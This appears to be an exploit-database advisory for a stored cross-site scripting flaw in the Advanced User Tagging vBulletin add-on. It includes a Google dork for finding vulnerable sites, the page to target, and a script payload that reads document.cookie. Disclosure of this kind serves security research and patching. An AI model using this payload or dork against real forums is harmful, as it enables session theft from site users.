Advanced User Tagging vBulletin Stored XSS Vulnerability

2013-07-10 / 2013-07-24

Credit: []0iZy5

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: intext:usertag_pro

##############################################
#
# Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability
# Google Dork: intext:usertag_pro
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
# Version: vBulletin 3.8.x, vBulletin 4.x.x
# Tested on: Linux & Windows
#
##############################################
#
# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions
# (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription
#
# Stage 2: Add a malicious hash tag.
# (Example:) "><script>alert(document.cookie)</script>
#
##############################################
#
# This was written for educational purpose only. use it at your own risk.
# Author will be not responsible for any damage caused! user assumes all responsibility.
# Intended for authorized web application pentesting only!
#
##############################################

References:

http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product

http://www.backtrack-linux.ro

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Advanced User Tagging vBulletin Stored XSS Vulnerability

Dork: intext:usertag_pro

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.